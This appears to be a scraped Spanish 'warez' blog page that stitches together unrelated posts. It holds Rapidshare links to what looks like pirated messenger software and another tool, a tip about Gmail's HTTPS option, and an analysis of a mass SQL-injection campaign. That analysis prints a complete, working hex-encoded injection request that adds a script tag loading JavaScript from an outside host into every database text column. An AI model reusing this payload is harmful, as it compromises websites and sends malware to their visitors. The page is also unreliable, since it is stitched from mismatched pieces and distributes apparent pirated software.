NIGHTMAN WAREZ

Descripción:
El mensajero del Lan es una herramienta de gran alcance de la comunicación para los grupos pequeños-medios de usuarios dentro de una red local. Los usuarios pueden enviar un mensaje a los recipientes múltiples. Con la opción de la generación automática de una lista del contacto, vea quién está disponible y quién no está vía el panel derecho de la ventana. Exprese las sensaciones con los emoticons atractivos para permitir una comprensión mejor del significado del usuario. El mensajero del lan del winpopup incluye a respondedor auto que ofrece la conveniencia de enviar contestaciones automáticas. Recupere la historia del mensaje vía la ventana del registro de mensaje que también permite el buscar, el filtrarse y el exportar de mensajes importantes. Dé sus mensajes que una voz eligiendo el mensaje con Winpopup habla agrega encendido. Con un interfaz de uso fácil, el winpopup es fácil de instalar, simple utilizar y no necesita administrar. Los usuarios del Lan pueden enviar una contestación rápida con apenas dos tecleos del ratón. Reciba la ayuda técnica ilimitada del email del personal amistoso. Seleccione los sonidos para ser jugado cuando enviar o la recepción de mensajes de los doce sonidos (* wav) proporcionó por el mensajero del lan del winpopup. Hay un anfitrión de las características atractivas del mensajero del lan del winpopup que abrogarán a cualquier usuario básico y la entrega rápida del mensaje está garantizada. El mensajero del lan es muy flexible, por ejemplo, usted puede cambiar la mirada del mensaje con la selección de tamaño de fuente. Informe a otros su presencia o ausencia seleccionando una de las opciones del estado del usuario. Desemejante de algunos otros winpopups del mensajero, no hay límite en el tamaño de cada mensaje. Los mensajes se transfieren a las altas velocidades, permitiendo la discusión en tiempo real. Configure la lista del contacto y especifique los grupos de contactos con facilidad y flexibilidad. El winpopup tiene una característica de la charla también. Es una ventana separada para la comunicación con cada usuario. Así, usted puede estar en tacto con varios personas y charlar diversos asuntos sin conseguir confundido. La mensajería inmediata nunca ha sido más fácil de configurar y de utilizar.

Tamaño:1.43 mb
Link: http://rapidshare.com/files/20079926…ginal.exe.html

Numero de link: 1
Nombre: winpopup-lan-messenger-5.1_original
IDIOMA: ESPAÑOL / INGLES…

Similar al que ocupan en grandes tiendas contructoras Sodimac, Home depo
NO requiere de ninguna maquina

DESCARGA

http://rapidshare.com/files/166694650/corte.part3.rar
http://rapidshare.com/files/166698861/corte.part2.rar
http://rapidshare.com/files/166484932/corte.part1.rar

Datos Técnicos

Descripción

Demo

Enlaces

Web del Autor

HomePage

En varias ocasiones hemos hablado sobre cómo hacer para que nuestras sesiones en Gmail transcurran cifradas. Sin embargo eso no evita el uso de cookies no cifradas, lo que bajo determinadas circunstancias puede permitir a un intruso acceder a nuestras cuentas.

El asunto viene de lejos y a él se atribuye algún robo de cuenta (incluso la de algún reputado experto en seguridad), pero ahora (que el ataque ha sido demostrado en Defcon y se anuncia una herramienta para explotarlo) Google ha reaccionado y ha añadido una opción en la configuración de cada cuenta Gmail que permite garantizar el uso permanente y completo de cifrado en https. Sin embargo, me llama la atención que Google, tan proclive en otras ocasiones a adoptar configuraciones por defecto sin contar con el usuario, no haya marcado ésta como opción por defecto. Supongo que se debe a que el cifrado impone una mayor carga a sus servidores.

Por tanto, si utilizas Gmail, te toca a ti hacerlo cuanto antes desde la opción de configuración de tu cuenta, marcando la casilla que señalo en la imagen y pulsando después “Guardar cambios”:FUENTE

Un nuevo ataque de inyección de SQL ha venido circulando la semana pasada, y parece que ha infectado algunos cientos de servidores web en la tarde del viernes pasado. Los ataques se ven similares al que se muestra a continuación, e intentan consultar por archivos aleatorios validos en el servidor web.

Las tablas de sysobjects y syscolumns son consultadas y esto nos da una muy buena pista: las maquinas que se están atacando corren MSSQL, y se esta guardando código HTML dentro de la base de datos. También es posible que los servidores web con Sybase database backends sean explotables, ya que Sybase utiliza de manera muy amplia la misma sintaxis y estructura de las tablas que MSSQL server.

La sentencia SQL escanea todas las tablas de la base de datos, insertando el código HTML del atacante en cada una de las paginas. Esto causa que el servidor web envié a los visitantes, dependiendo de su cliente web, a diferentes formas de malware que se aloja en paginas referenciadas
por el código HTML maligno. Similar al phishing, este ataque toma ventaja de que el visitante del sitio web confía en el sitio que están visitando. En vez de suplantar la identidad del sitio confiado, el sitio confiado es aquel que le envía el malware al cliente, quien tiene mayores probabilidades de aceptar.

Este tipo de ataque puede ser usado para lanzar ataques de phishing tradicionales en sitios que solicitan información financiera, o cualquier otro tipo de ataque en donde la confianza de los visitantes pueda ser explotada.

Los requests que saldrían en los logs del web server se asemejan al siguiente:

GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0×4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Esta salida decodificada nos muestra la siguiente sentencia SQL (URLs han sido removidas):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

Este ataque todavía sigue en funcionamiento hasta el día de hoy. Se ha obtenido evidencia de explotación satisfactoria a través de cientos de paginas web. Estas paginas estaban asociadas con otras paginas al rededor del mundo suplantando contenido (incluyendo sitios de gobierno, sitios de venta por Internet, sitios de información financiera, entre otros).